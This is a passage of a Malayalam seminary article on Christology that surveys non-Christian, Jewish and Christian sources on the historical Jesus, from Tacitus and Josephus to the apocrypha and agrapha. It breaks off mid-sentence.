ഡോ. സെബാസ്റ്റ്യന്‍ ചാലക്കല്‍
(വടവാതൂര്‍ സെമിനാരി)
ആമുഖം 1
“ഞാന്‍ ആരെന്നാണ് നിങ്ങള്‍ പറയുന്നത്?” (മര്‍ക്കോ 8:29). യേശുവിന്‍റെ ഈ ചോദ്യത്തിന് കാലാകാലങ്ങളില്‍ വിവിധങ്ങളായ ഉത്തരങ്ങള്‍ പലരും നല്‍കിയിട്ടുണ്ട്. യേശുവിന്‍റെ കാലം മുതല്‍ ഇന്നുവരെയും വ്യത്യസ്ത രീതികളിലാണ് മനുഷ്യര്‍ യേശുവിനെ മനസ്സിലാക്കിയത്. ചിലര്‍ വിപ്ലവകാരിയായും മറ്റുചിലര്‍ വെറുമൊരു മതാചാര്യനായും വേറെചിലര്‍ നലംതികഞ്ഞ ഒരു മതപണ്ഡിതനായും ഇനിയും ഒരുകൂട്ടര്‍ ധാര്‍മ്മികഉപദേഷ്ടാവായും ഒരുവിഭാഗം മതസ്ഥാപകനായും കുറെയധികം ആളുകള്‍ ഒരു പരിപൂര്‍ണ്ണമനുഷ്യനായും യേശുവിനെ മനസ്സിലാക്കി. ഓരോരുത്തരും തങ്ങളുടെ ചിന്താഗതിയനുസരിച്ച് ഓരോ ക്രിസ്തുരൂപം (Christ Image) തങ്ങളുടെ മനസ്സില്‍ പ്രതിഷ്ഠിക്കുന്നു. തങ്ങളുടെ ക്രിസ്തുരൂപമാണ് യതാര്‍ത്ഥത്തിലുള്ള ക്രിസ്തു എന്നാണ് അവര്‍ ചിന്തിക്കുന്നത്. ഇപ്രകാരം വിഭിന്നങ്ങളായ ക്രിസ്തുരൂപങ്ങള്‍ക്കിടയില്‍ ഒരു ചോദ്യം ഉയരുന്നു: യഥാര്‍ത്ഥത്തില്‍ ആരാണ് യേശു?
ക്രിസ്തുവിനെ കേന്ദ്രീകരിച്ചുള്ള ദൈവശാസ്ത്രപഠനമാണ് ക്രിസ്തുവിജ്ഞാനീയം. യേശുവിന്‍റെ വ്യക്തിത്വത്തെയും അവിടുത്തെ സ്വഭാവങ്ങളെയുംകുറിച്ചു മാത്രമല്ല ചരിത്രപുരുഷനായ യേശുവിന്‍റെ ജീവിതവും മരണവും ഉത്ഥാനവുമെല്ലാം ക്രിസ്തുവിജ്ഞാനീയത്തിലെ പഠനവിഷയങ്ങളാണ്. നമ്മെപ്പോലെ ചരിത്രത്തില്‍ ജീവിച്ച ഒരു വ്യക്തിയാണ് യേശു. ഈ സത്യമാണ് ചരിത്രപുരുഷനായ യേശു എന്ന പദം കൊണ്ട് അര്‍ത്ഥമാക്കുന്നത്. ഈ ലേഖനത്തിന്‍റെ ഒന്നാം ഭാഗത്ത് ചരിത്രപുരുഷനായ യേശുവിക്കെുറിച്ചറിയാനുള്ള രേഖകളും രണ്ടാംഭാഗത്ത് യേശുവിനെക്കുറിച്ചുള്ള ആധുനികകാല ചരിത്രാന്വേഷണവുമാണ് പ്രതിപാദിക്കുന്നത്.
A. യേശുവിനെക്കുറിച്ചുള്ള ചരിത്രരേഖകള്‍
ചരിത്രപുരുഷനായ യേശുവിനെക്കുറിച്ച് അറിവുനല്‍കുന്ന ചരിത്രരേഖകള്‍ ഒന്നുംതന്നെ സമീപകാലത്ത് നമുക്ക് ലഭിച്ചിട്ടില്ല. തന്‍റെ ജീവിതത്തെക്കുറിച്ച് യേശുതന്നെയും ഒന്നും എഴുതിവച്ചിട്ടില്ല. നമുക്ക് ലഭ്യമായിട്ടുള്ള രേഖകളെല്ലാംതന്നെ യേശുവിന്‍റെ മരണശേഷം എഴുതപ്പെട്ടവയാണ്. യേശുവിനെക്കുറിച്ചുള്ള ചരിത്രരേഖകളില്‍ ക്രൈസ്തവരേഖകളും ക്രൈസ്തവേതരരേഖകളും ഉണ്ട്.
1. അക്രൈസ്തവസാക്ഷ്യങ്ങളും രേഖകളും
യേശുവിനെക്കുറിച്ച് അക്രൈസ്തവരേഖകള്‍ വളരെക്കുറച്ചു കാര്യങ്ങളേ പ്രതിപാദിക്കുന്നുള്ളൂ. കാരണം ഈ രേഖകളുടെ ലക്ഷ്യം യേശുവിന്‍റെ ചരിത്രം അവതരിപ്പിക്കുകയായിരുന്നില്ല. അക്കാലഘട്ടത്തിലെ രാഷ്ട്രീയപരവും സാമൂഹികവുമായ ചരിത്രം രേഖപ്പെടുത്തുമ്പോള്‍ അവ യേശുവിനെക്കുറിച്ച് ചില പരാമര്‍ശനങ്ങള്‍ നടത്തുന്നു എന്നുമാത്രം. യേശുവിനെക്കുറിച്ച് വളരെക്കുറച്ച് കാര്യങ്ങളേ അക്രൈസ്തവരചനകള്‍ നല്‍കുന്നുള്ളൂവെങ്കിലും, ഇവ വളരെ പ്രധാനപ്പെട്ടവയാണ്. ചരിത്രപുരുഷനായ യേശുവിന്‍റെ അസ്തിത്വത്തെക്കുറിച്ച് ചോദ്യം ചെയ്യപ്പെടാനാവാത്ത വിധത്തില്‍ ഈ അക്രൈസ്തവരചനകള്‍ സാക്ഷ്യം നല്‍കുന്നു.
1.1. താലോസ് (Thallos)
റോമാക്കാരനായ താലോസിന്‍റെ കൃതികളെല്ലാം നഷ്ടപ്പെട്ടുപോയെങ്കിലും, മറ്റു ചരിത്രകാരന്മാരുടെ ഉദ്ധരണികളില്‍നിന്നും താലോസിനേക്കുറിച്ച് അറിയാന്‍ കഴിയുന്നു. സെക്സ്റ്റസ് ജൂലിയസ് ആഫ്രിക്കാനൂസ് (Sextus Julices Africanus ca.160-240) എന്ന ചരിത്രകാരന്‍ History of the World എന്ന തന്‍റെ ഗ്രന്ഥത്തില്‍ താലോസിനെ ഉദ്ധരിച്ചിട്ടുണ്ട്. അതുപോലെതന്നെ ബൈസന്‍റയിന്‍ ചരിത്രകാരനായ ജോര്‍ജ്ജിയൂസ് സിന്‍ചെലൂസും തന്‍റെ Chronicles എന്ന കൃതിയില്‍ താലോസിനെ ഉദ്ധരിക്കുന്നുണ്ട്. ക്രിസ്തീയ വിശ്വാസത്തിനെതിരായാണ് താലോസ് എഴുതുന്നത്. യേശുവിന്‍റെ മരണസമയത്തുണ്ടായ അന്ധകാരത്തെ സൂര്യഗ്രഹണം എന്നാണ് താലോസ് വിശേഷിപ്പിക്കുന്നത്.2
1.2. പ്ലീനി (Pliny the Younger c. 61-113)
റോമിലെ ഒരു സെനറ്ററായിരുന്നു പ്ലീനി. അദ്ദേഹത്തിന്‍റെ Letters എന്ന ഗ്രന്ഥസമുച്ചയത്തിന്‍റെ പത്താമത്തെ വാല്യത്തില്‍ ക്രിസ്ത്യാനികളെക്കുറിച്ചും ക്രിസ്തുവിനെപ്പറ്റിയും പ്രതിപാദിക്കുന്നു. ക്രിസ്ത്യാനികള്‍ പതിവായി പ്രഭാതത്തിനുമുമ്പ് ഒരുമിച്ചുകൂടി സ്തുതിഗീതങ്ങള്‍ പാടി ക്രിസ്തുവിനെ ദൈവമെന്നപോലെ ആരാധിച്ചിരുന്നു എന്നു പ്ലീനി സാക്ഷ്യപ്പെടുത്തുന്നു. ആദിമക്രിസ്ത്യാനികള്‍ ഒന്നാം നൂറ്റാണ്ടില്‍ത്തന്നെ യേശുവിനെ ദൈവമായിക്കരുതി ആരാധിച്ചിരുന്നു എന്നതിനുള്ള ക്രൈസ്തവേതരസാക്ഷ്യമാണിത്. യേശുവിന്‍റെ ദൈവത്വം നൂറ്റാണ്ടുകള്‍ക്കുശേഷം സഭ സ്ഥാപിച്ചെടുത്ത കാര്യമാണെന്ന ചിലരുടെ വാദത്തിന് വ്യക്തമായ മറുപടിയാണ് പ്ലീനിയുടെ ഈ സാക്ഷ്യം.3
1.3. സുവെത്തോണിയൂസ് (Gaius Suetonius Tranquillus c. 70-140)
റോമന്‍ എഴുത്തുകാരനായ സുവെത്തോണിയൂസ് പന്ത്രണ്ടു ചക്രവര്‍ത്തിമാരെക്കുറിച്ച് എഴുതിയ De Vita Caesarum എന്ന കൃതിയില്‍ ക്രിസ്തുവിനെക്കുറിച്ച് പരാമര്‍ശിക്കുന്നുണ്ട്. ക്രെസ്തുസിന്‍റെ പേരില്‍ പ്രശ്നമുണ്ടാക്കിയ ചില യഹൂദരെ ക്ലോഡിയസ് ചക്രവര്‍ത്തി റോമാ നഗരത്തില്‍ നിന്നു ബഹിഷ്ക്കരിച്ചു എന്ന് സുവെത്തോണിയൂസ് സാക്ഷ്യപ്പെടുത്തുന്നു. ഈ സംഭവത്തെക്കുറിച്ച് അപ്പസ്തോല പ്രവര്‍ത്ത നങ്ങളില്‍ (അപ്പ 18:2) പ്രദിപാദിക്കുന്നുണ്ട്. സുവെത്തോണിയൂസ് ഉപയോഗിച്ചിരിക്കുന്ന “ക്രെസ്തൂസ്” എന്ന പദം “ക്രിസ്തു” എന്നതിന് ഗ്രീക്ക് ഭാഷയില്‍ ഉപയോഗിക്കുന്ന “ക്രിസ്തോസ്” എന്ന പദമാണെന്ന് വ്യക്തമാണ്.4
1.4. ടാസിറ്റസ് (Cornelius Tacitus c. 56-120)
റോമന്‍ ചരിത്രകാരനായ ടാസിറ്റസ് തന്‍റെ Annals എന്ന കൃതിയില്‍ ക്രിസ്തുവിനെക്കുറിച്ചും ക്രിസ്ത്യാനികളെക്കുറിച്ചും പ്രതിപാദിക്കുന്നുണ്ട്. എ.ഡി. 64-ല്‍ റോമിലുണ്ടായ അഗ്നിബാധയുടെ പശ്ചാത്തലത്തിലാണ് അദ്ദേഹം എഴുതുന്നത്. താഴെപ്പറയുന്ന കാര്യങ്ങളാണ് ടാസിറ്റസ് അവതരിപ്പിച്ചിട്ടുള്ളത്. ക്രിസ്ത്യാനികള്‍ എന്ന വിഭാഗത്തിന്‍റെ ആരംഭകന്‍ ക്രിസ്തുവാണ്. ക്രിസ്തു തിബേരിയൂസ് ചക്രവര്‍ത്തിയുടെ കാലത്ത് പൊന്തിയൂസ് പീലാത്തോസിനാല്‍ വധിക്കപ്പെട്ടു. ക്രിസ്ത്യാനികള്‍ എന്ന ഈ അന്ധവിശ്വാസപ്രസ്ഥാനം ആരംഭിച്ചത് യൂദയായിലാണ്. ഇപ്പോള്‍ ഈ പ്രസ്ഥാനം റോമായിലും പ്രചരിച്ചിരിക്കുന്നു.5
1.5. മാറാ ബര്‍ സെറാപ്പിയോന്‍ (Mara bar Serapion)
എ.ഡി. 70-ല്‍ സെറാപ്പിയോനിന്‍റെ മകനായ മാറാ എന്നയാള്‍ തന്‍റെ പുത്രനെ അഭിസംബോധന ചെയ്തുകൊണ്ട് എഴുതിയ കത്തില്‍ യേശുവിനെക്കുറിച്ച് പ്രതിപാദിക്കുന്നുണ്ട്. സുറിയാനിയിലാണ് ഇത് എഴുതിയിരിക്കുന്നത്. യേശു എന്ന പേര് പരാമര്‍ശിക്കാതെ “ജ്ഞാനിയായ രാജാവ്” എന്നാണ് ഇതില്‍ എഴുതിയിരിക്കുന്നത്. താഴെപ്പറയുന്ന ആശയങ്ങളാണ് ഈ കത്തിന്‍റെ ഉള്ളടക്കം. “ജ്ഞാനിയായ രാജാവ്” സ്വന്തം ജനതയാല്‍ വധിക്കപ്പെട്ടു. യഹൂദരാജ്യത്തിന്‍റെ അന്ത്യത്തിനു കാരണം അവര്‍ ഈ രാജാവിനെ തിരസ്ക്കരിച്ചു എന്നതാണ്. തന്‍റെ “പുതിയനിയമത്തിലൂടെ ഈ രാജാവ് ഇന്നും ജീവിക്കുന്നു.” ഇതില്‍ പ്രതിപാദിച്ചിരിക്കുന്ന “ജ്ഞാനിയായ രാജാവ്” യേശുവാണെന്നും, “പുതിയനിയമം” എന്നതുകൊണ്ടുദ്ദേശിക്കുന്നത് ക്രിസ്തീയസമൂഹത്തിന്‍റെ സ്ഥാപനത്തെയുമാണെന്നാണ് പണ്ഡിതനിഗമനം.6
1.6. സാമോസോത്തായിലെ ലൂസിയന്‍ (Lucian of Samosota c. 115-200)
ഗ്രീക്ക് എഴുത്തുകാരനായ ലൂസിയന്‍ എ.ഡി. 165-നോടടുത്ത് രചിച്ച The Death of Peregrinus എന്ന ഗ്രന്ഥത്തിലാണ് യേശുവിനെപ്പറ്റി പരാമര്‍ശിച്ചിട്ടുള്ളത്. വിജാതീയനായിരുന്ന പെരഗ്രീനുസ് ക്രിസ്തുമതം സ്വീകരിച്ചു. എന്നാല്‍ പിന്നീട് ക്രിസ്തുമതം ഉപേക്ഷിച്ച് വിപ്ലവകാരിയായി അവസാനം നിരാശനായി ആത്മഹത്യ ചെയ്തു. പെരഗ്രീനുസിന് സംഭവിച്ചതു മനസ്സിലാക്കി ക്രിസ്തുമതത്തില്‍ നിന്നു അകന്നു നില്‍ക്കണമെന്നാണ് ലൂസിയന്‍ മുന്നറിയിപ്പു നല്‍കുന്നത്. ക്രിസ്ത്യാനികളെയും ക്രിസ്തുമതസ്ഥാപകനായ യേശുവിനെയും പരിഹസിച്ചാണ് ലൂസിയന്‍ എഴുതിയിരിക്കുന്നത്. താഴെപ്പറയുന്ന കാര്യങ്ങളാണ് ഈ കൃതിയില്‍ യേശുവിനെക്കുറിച്ച് എഴുതിയിരിക്കുന്നത്. യേശു എന്ന പേരു പറയാതെ “ആ മനുഷ്യന്‍”, “അവര്‍ ഇന്നും ആരാധിക്കുന്നവന്‍”, “ആദ്യനിയമദായകന്‍”, “സംരക്ഷകന്‍” എന്നൊക്കെയാണ് ലൂസിയന്‍ യേശുവിനെ വിശേഷിപ്പിക്കുന്നത്. യേശുവിനെ പലസ്തീനയില്‍ കുരിശില്‍ തൂക്കിക്കൊന്നു. ക്രിസ്ത്യാനികളുടെ നിയമങ്ങളും ജീവിതരീതിയും യേശുവില്‍ നിന്നാണ് വരുന്നത്.7
1.7. സെല്‍സുസ് (Celsus)
ക്രിസ്തുമതത്തെ അവഹേളിക്കാന്‍ ഉദ്ദേശം എ.ഡി. 175-ല്‍ സെല്‍സുസ് രചിച്ച True Doctrine എന്ന ഗ്രന്ഥത്തിലാണ് അദ്ദേഹം യേശുവിനെപ്പറ്റി പ്രതിപാദിച്ചിട്ടുള്ളത്. ഈ ഗ്രന്ഥം നഷ്ടപ്പെട്ടുപോയെങ്കിലും ഒരിജന്‍റെ Contra Celsum എന്ന കൃതിയില്‍ നിന്ന് ഈ ഗ്രന്ഥം ഏറെക്കുറെ ലഭ്യമാണ്. ക്രിസ്തുമതത്തെ അവഹേളിക്കാന്‍വേണ്ടി മാത്രമാണ് സെല്‍സുസ് എഴുതിയത്. അതുകൊണ്ടുതന്നെ സെല്‍സുസ് എഴുതിയകാര്യങ്ങള്‍ ആരും മുഖവിലയ്ക്കെടുക്കുന്നില്ല.8
2. യഹൂദസാക്ഷ്യങ്ങളും രേഖകളും
യേശുവിനെക്കുറിച്ചുള്ള യഹൂദസാക്ഷ്യങ്ങളും രേഖകളും പരമിതങ്ങളാണ്. യേശുവിന്‍റെ കാലത്തു ജീവിച്ചിരുന്ന യഹൂദചരിത്രകാരന്മാരില്‍ പലരും യേശുവിനെപ്പറ്റി പ്രതിപാദിക്കുന്നേയില്ല. പ്രതിപാദിച്ചിട്ടുള്ളവര്‍ പോലും ചെറിയ പരാമര്‍ശനങ്ങള്‍ മാത്രമാണ് നടത്തിയിട്ടുള്ളത്.
2.1. ഫ്ളാവിയൂസ് ജോസേഫൂസ് (Flavius Josephus c. 37-100)
യഹൂദചരിത്രകാരനായ ഫ്ളാവിയൂസ് ജോസേഫൂസ്. തന്‍റെ Antiquities of the Jews എന്ന ഗ്രന്ഥത്തിലാണ് യേശുവിനെപ്പറ്റി അദ്ദേഹം പ്രതിപാദിക്കുന്നത്. രണ്ടു മുഖ്യപരാമര്‍ശനങ്ങള്‍ താഴെപ്പറയുന്നവയാണ്. ഒന്നാമത്തെ ഉദ്ധരണിയില്‍ യേശു, ക്രിസ്തു എന്നു വിളിക്കപ്പെട്ടിരുന്നു എന്നകാര്യം സാക്ഷ്യപ്പെടുത്തുന്നു. രണ്ടാമത്തെ ഉദ്ധരണിയുടെ ആധികാരികതയെക്കുറിച്ച് പണ്ഡിതരുടെ ഇടയില്‍ വിഭിന്നാഭിപ്രായങ്ങളുണ്ട്. ഈ ഉദ്ധരണിയനുസരിച്ച് യേശു ജ്ഞാനിയായ, ഒട്ടേറെ അദ്ഭുതങ്ങള്‍ ചെയ്ത വ്യക്തിയായിരുന്നു. അനേകം ഗ്രീക്കുകാരെയും യഹൂദരെയും യേശു തന്നിലേക്കാകര്‍ഷിച്ചു. യഹൂദരില്‍ ചിലര്‍ യേശുവില്‍ കുറ്റം ചുമത്തിയപ്പോള്‍ പീലാത്തോസ് അദ്ദേഹത്തെ കുരിശില്‍ തറച്ചുകൊന്നു. എന്നാല്‍ യേശു മൂന്നാംദിവസം വീണ്ടും ജീവനുള്ളവനായി പ്രത്യക്ഷപ്പെട്ടു. യേശുവിനെപ്പറ്റി അനേകം കാര്യങ്ങള്‍ ദൈവത്തിന്‍റെ പ്രവാചകന്മാര്‍ പ്രവചിച്ചിട്ടുണ്ടായിരുന്നു. ക്രിസ്തുവിന്‍റെ പേരില്‍ വിളിക്കപ്പെടുന്ന ‘ക്രിസ്ത്യാനികള്‍’ എന്ന വിഭാഗം ഇപ്പോഴുമുണ്ട്.
2.2. താല്‍മൂദ്
താല്‍മൂദ് എന്ന അറമായ വാക്കിന്‍റെ അര്‍ത്ഥം “പഠനം” (teaching) എന്നാണ്. വി.ഗ്രന്ഥരചനക്കുശേഷം യഹൂദമതത്തില്‍ ഉണ്ടായിട്ടുള്ള മതപരമായ കൃതികളുടെ സമുച്ചയമാണ് താല്‍മൂദ്. യഹൂദരുടെ വിശുദ്ധ ഗ്രന്ഥങ്ങളില്‍ ഇല്ലാത്ത വാമൊഴിയായ പാരമ്പര്യങ്ങളും (മിഷ്നാ) റബ്ബിമാരുടെ വ്യാഖ്യാനങ്ങളും (ഗമാറ) കാലാകാലങ്ങളില്‍ സമാഹരിച്ചുവച്ചിട്ടുള്ളതാണ് താല്‍മൂദിന്‍റെ ഉള്ളടക്കം. ബി.സി. ഒന്നാം നൂറ്റാണ്ടുമുതല്‍ എ.ഡി. രണ്ടാം നൂറ്റാണ്ടുവരെയുള്ള കാലഘട്ടത്തില്‍ അറമായഭാഷയിലാണ് ഇവ രചിക്കപ്പെട്ടത്. താല്‍മൂദ് രണ്ടു തരത്തിലുണ്ട്. പലസ്തീനിയന്‍ താല്‍മൂദും ബാബിലോണിയന്‍ താല്‍മൂദും. പലസ്തീനിയന്‍ താല്‍മൂദിലും ബാബിലോണിയന്‍ താല്‍മൂദിലും ക്രിസ്ത്യാനികളെയും യേശുവിനെയും വിമര്‍ശിക്കുന്ന അനേകം പരാമാര്‍ശനങ്ങളുണ്ട്. യഹൂദരെ യേശുവില്‍ നിന്നും ക്രിസ്തീയവിശ്വാസത്തില്‍നിന്നും അകറ്റി നിര്‍ത്തുക എന്ന ലക്ഷ്യത്തോടെയാണ് ഇവ എഴുതപ്പെട്ടിട്ടുള്ളത്. താഴെപ്പറയുന്നവയാണ് മുഖ്യ ആരോപണങ്ങള്‍. നസ്രായനായ യേശു ജാലവിദ്യകള്‍ കാട്ടുന്നവനായിരുന്നു. യേശു അനേകം യഹൂദരെ വഴിതെറ്റിച്ചു. പെസഹാതിരുന്നാളിന്‍റെ സാബത്തു ദിവസം യേശുവിനെ തൂക്കിലേറ്റി. 9
2.3. തൊളേഡോത്ത് യേഷു (Toledot Yeshu)
റബ്ബീനിക് പാരമ്പര്യത്തില്‍ ക്രിസ്തീയവിശ്വാസത്തിന് എതിരായ ഒരു ക്രിസ്തുചരിത്രം Book of the Life of Jesus (ഹീബ്രുവില്‍ Sefer Toledot Yeshu) പ്രചരിച്ചിരുന്നു. ക്രൈസ്തവവിശ്വാസം സ്വീകരിക്കുന്നതില്‍ നിന്നും യഹൂദരെ തടയുകയെന്നതായിരുന്നു ഇതിന്‍റെ ലക്ഷ്യം. തൊളേഡോത്ത് യേഷു “എതിര്‍സുവിശേഷം” എന്നാണ് അറിയപ്പെടുന്നത്. യേശുവിനെ ജാരസന്തതിയായും, മന്ത്രവാദിയായും, അബദ്ധപ്രബോധകനായുമാണ് ഈ ഗ്രന്ഥത്തില്‍ അവതരിപ്പിക്കുന്നത്. ഈ ഗ്രന്ഥത്തിലെ കാര്യങ്ങള്‍ ക്രിസ്തുമതത്തെ അവഹേളിക്കാന്‍ വേണ്ടിമാത്രം എഴുതിയതായതു കൊണ്ട് ഇതിന്‍റെ ചരിത്രപരതയും ആധികാരികതയും പണ്ഡിതന്മാര്‍ അംഗീകരിക്കുന്നില്ല.10
3. ക്രൈസ്തവ രചനകള്‍
യേശുവിനെക്കുറിച്ചുള്ള ക്രൈസ്തവരചനകളില്‍ പുതിയനിയമവും അപ്പോക്രിഫയും അഗ്രാഫയും ഉള്‍പ്പെടുന്നു.
3.1. പുതിയനിയമം
യേശുവിനെക്കുറിച്ചുള്ള ഏറ്റവും പ്രധാനപ്പെട്ട രേഖകള്‍ പുതിയനിയമഗ്രന്ഥങ്ങള്‍ തന്നെയാണ്. പുതിയനിയമ ഗ്രന്ഥങ്ങളില്‍ത്തന്നെ സുവിശേഷങ്ങള്‍ നമ്മുടെ സവിശേഷശ്രദ്ധ അര്‍ഹിക്കുന്നു.
ക്രൈസ്തവര്‍ ബൈബിളിലെ പുതിയനിയമത്തെ പഴയനിയമത്തിന്‍റെ പൂര്‍ത്തീകരണമായാണ് മനസ്സിലാക്കുന്നത്. യേശുവിന്‍റെ ജീവിതവുമായി ബന്ധപ്പെടുത്തിയാണ് പഴയനിയമത്തെ മനസ്സിലാക്കുന്നത്. പഴയനിയമപ്രവചനങ്ങളുടെ പൂര്‍ത്തീകരണമാണ് യേശു. പുതിയനിയമത്തിലെ എല്ലാ ഗ്രന്ഥങ്ങളുടെയും കേന്ദ്രകഥാപാത്രം യേശുവാണ്. ഓരോ പുതിയനിയമഗ്രന്ഥവും ഓരോ ക്രിസ്തുവിജ്ഞാനീയം അവതരിപ്പിക്കുന്നു എന്നുപറയാം. അവ യേശുവിനെ അവതരിപ്പിക്കുമ്പോള്‍ നല്‍കുന്ന ഊന്നലുകളും വീക്ഷണങ്ങളും വ്യത്യസ്തങ്ങളാണ്. യേശുവിന്‍റെ ജീവിതത്തിലെ വ്യത്യസ്തവശങ്ങള്‍ അവ അവതരിപ്പിക്കുന്നു. എന്നാല്‍ പുതിയ മതഗ്രന്ഥങ്ങള്‍ നല്‍കുന്ന വ്യത്യസ്തചിത്രങ്ങള്‍ പരസ്പരവിരുദ്ധങ്ങളല്ല; മറിച്ച് പരസ്പരപൂരകങ്ങളാണ്. അതുകൊണ്ട് അവയെ ഒരു യാഥാര്‍ത്ഥ്യത്തിന്‍റെ വിവിധ അവതരണങ്ങളായി കണ്ടാല്‍ മതി. പുതിയനിയമഗ്രന്ഥകാരന്മാര്‍ നല്‍കുന്ന വ്യത്യസ്ത യേശുചിത്രങ്ങള്‍ ഒറ്റയ്ക്കൊറ്റയ്ക്കായിട്ടല്ല; സമഗ്രമായാണ് കാണേണ്ടത്.11
നാല് കാനോനികസുവിശേഷങ്ങളാണ് യേശുവിനെക്കുറിച്ചറിയാനുള്ള പ്രധാന ഉറവിടങ്ങള്‍. യേശുവിന്‍റെ ജീവിതത്തിന്‍റെ കാലാനുക്രമ വിവരണമല്ല സുവിശേഷങ്ങള്‍ നല്‍കുന്നത്. ചരിത്രപരമായ താത്പര്യങ്ങളേക്കാള്‍ ദൈവശാസ്ത്രപരമായ താല്‍പര്യങ്ങളാണ് സുവിശേഷകന്മാര്‍ക്കുണ്ടായിരുന്നത്. സുവിശേഷകന്മാരുടെ ലക്ഷ്യം യേശുവിന്‍റെ ജീവചരിത്രം രേഖപ്പെടുത്തുക എന്നതായിരുന്നില്ല. യേശുവിനെക്കുറിച്ചുള്ള എല്ലാക്കാര്യങ്ങളും സുവിശേഷങ്ങളില്‍ ഇല്ല. യോഹന്നാന്‍ സുവിശേഷകന്‍ വ്യക്തമാക്കുന്നതുപോലെ “ഈ ഗ്രന്ഥത്തില്‍ എഴുതപ്പെടാത്ത മറ്റനേകം അടയാളങ്ങളും യേശു ശിഷ്യരുടെ സാന്നിധ്യത്തില്‍ പ്രവര്‍ത്തിച്ചു. എന്നാല്‍ ഇവ തന്നെയും എഴുതപ്പെട്ടിരിക്കുന്നത് യേശു ദൈവപുത്രനായ ക്രിസ്തുവാണെന്നു നിങ്ങള്‍ വിശ്വസിക്കുന്നതിനും അങ്ങനെ വിശ്വസിക്കുക നിമിത്തം നിങ്ങള്‍ക്ക് അവന്‍റെ നാമത്തില്‍ ജീവന്‍ ഉണ്ടാകുന്നതിനും വേണ്ടിയാണ്”چ(യോഹ 20:30-31). സുവിശേഷങ്ങള്‍ രചിക്കപ്പെട്ടത് വിശ്വാസികളായ, വിശ്വാസം മറ്റുള്ളവരുമായി പങ്കുവയ്ക്കാന്‍ സന്നദ്ധരായ വ്യക്തികളിലൂടെയാണ്.
സുവിശേഷങ്ങളുടെ ലക്ഷ്യം കുറെ ചരിത്രവിവരങ്ങള്‍ പങ്കുവെയ്ക്കു കയെന്നതല്ല. യേശുവിനെ ദൈവപുത്രനായി പ്രഖ്യാപിക്കുന്ന വിശ്വാസ സാക്ഷ്യങ്ങളായിവേണം സുവിശേഷങ്ങളെ മനസ്സിലാക്കാന്‍. എന്നു കരുതി സുവിശേഷങ്ങള്‍ ചരിത്രപരമായി ആശ്രയിക്കാവുന്നതല്ല എന്നു പറയുന്നതും ശരിയല്ല. ചരിത്രത്തില്‍ യഥാര്‍ത്ഥത്തില്‍ സംഭവിച്ചിട്ടുള്ള കാര്യങ്ങള്‍ തന്നെയാണ് സുവിശേഷങ്ങളില്‍ പ്രതിപാദിക്കപ്പെട്ടിട്ടുള്ളത്.
3.2. അപ്പോക്രിഫ
കാനോനികഗ്രന്ഥങ്ങളെ അനുകരിച്ച് എഴുതപ്പെട്ട, അതിശയോക്തി കലര്‍ന്ന കഥകളും ഭാവനാത്മകമായ വിവരണങ്ങളും നിറഞ്ഞ ഗ്രന്ഥങ്ങളാണ് അപ്രമാണികഗ്രന്ഥങ്ങള്‍ എന്ന് അറിയപ്പെടുന്നത്. അപ്രമാണിക ഗ്രന്ഥങ്ങള്‍ “അപ്പോക്രിഫ” എന്ന പേരിലും അറിയപ്പെടുന്നുണ്ട്. ‘അപ്പോക്രിഫ’ എന്ന ഗ്രീക്കു പദത്തിന്‍റെ അര്‍ത്ഥം “മറഞ്ഞിരിക്കുന്നത്” എന്നാണ്. ബൈബിളിലെ 73 ഗ്രന്ഥങ്ങളില്‍ ഉള്‍പ്പെടാത്തവയാണ് ഇവ. പഴയനിയമ അപ്രമാണികഗ്രന്ഥങ്ങളും (ഉദാഹരണത്തിന്, ഒന്നാം എസ്ദ്രാസ്, ഏനോക്കിന്‍റെ പുസ്തകങ്ങള്‍), പുതിയനിയമ അപ്രമാണിക ഗ്രന്ഥങ്ങളും (ഉദാഹണത്തിന്, യാക്കോബിന്‍റെ സുവിശേഷം, തോമസ്സിന്‍റെ സുവിശേഷം) ഉണ്ട്. അപ്രമാണികഗ്രന്ഥങ്ങളില്‍ പലതും, കാനോനിക ഗ്രന്ഥകര്‍ത്താക്കളില്‍ തെറ്റായി ആരോപിക്കപ്പെട്ടവയാണ്. ആധികാരികത ലഭിക്കാന്‍ വേണ്ടി ഉപയോഗിച്ചിരിക്കുന്ന വ്യാജനാമങ്ങളാണിവ. അപ്രമാണിക ഗ്രന്ഥങ്ങളെ ദൈവനിവേശിതങ്ങളായി സഭ പരിഗണിക്കുന്നില്ല. പുതിയനിയമ അപ്രാമാണികഗ്രന്ഥങ്ങളില്‍ സുവിശേഷങ്ങളും, നടപടികളും ലേഖനങ്ങളും വെളിപാടുകളുമുണ്ട്. അപ്പോക്രിഫല്‍ സുവിശേഷങ്ങളില്‍ അനേകം അസാധാരണ അദ്ഭുതവിവരണങ്ങളും അവിശ്വസനീയങ്ങളായ പല വിവരണങ്ങളും ഉണ്ട്. യേശുവിന്‍റെ ജീവിതത്തെയും പ്രബോധനത്തെയുംക്കുറിച്ച് ആധികാരികമായി മനസ്സിലാക്കാന്‍ ഇവയെ ആശ്രയിക്കാന്‍ സാധ്യമല്ല. എന്നാല്‍ ആദിമസഭയെപ്പറ്റി പ്രാമാണികഗ്രന്ഥങ്ങളില്‍ ഇല്ലാത്ത പല വിശദാംശങ്ങളും അപ്പോക്രിഫല്‍ഗ്രന്ഥങ്ങളില്‍ നിന്നു ലഭ്യമാണ്.12
3.3. അഗ്രഫാ
അഗ്രഫാ (Agrapha) എന്ന ഗ്രീക്കു പദത്തിന്‍റെ അര്‍ത്ഥം “എഴുതപ്പെടാത്ത കാര്യങ്ങള്‍” എന്നാണ്. “എഴുതപ്പെടാത്ത കാര്യങ്ങള്‍”എന്നതുകൊണ്ട് കാനോനികസുവിശേഷങ്ങളില്‍ എഴുതപ്പെടാത്ത കാര്യങ്ങള്‍ എന്നാണര്‍ത്ഥമാക്കുന്നത്. സുവിശേഷങ്ങളില്‍ ചേര്‍ത്തിട്ടില്ലാത്ത യേശുവിന്‍റെ വചനങ്ങളുടെ സമാഹാരമാണ് “അഗ്രഫാ” എന്ന പേരില്‍ അറിയപ്പെടുന്നത്. ആരംഭകാല ക്രിസ്ത്യന്‍ എഴുത്തുകാരുടെയും സഭാപിതാക്കന്മാരുടെയും ഗ്രന്ഥങ്ങളിലാണ് ഇവ രേഖപ്പെടുത്തപ്പെട്ടിട്ടുള്ളത്. സഭാസമൂഹങ്ങളില്‍ വാമൊഴിയായി പ്രചാരത്തിലിരുന്ന എല്ലാ കാര്യങ്ങളും കാനോനികസുവിശേഷങ്ങളില്‍ ഉള്‍ച്ചേര്‍ത്തിട്ടില്ല. പൗലോസ്ശ്ലീഹാ 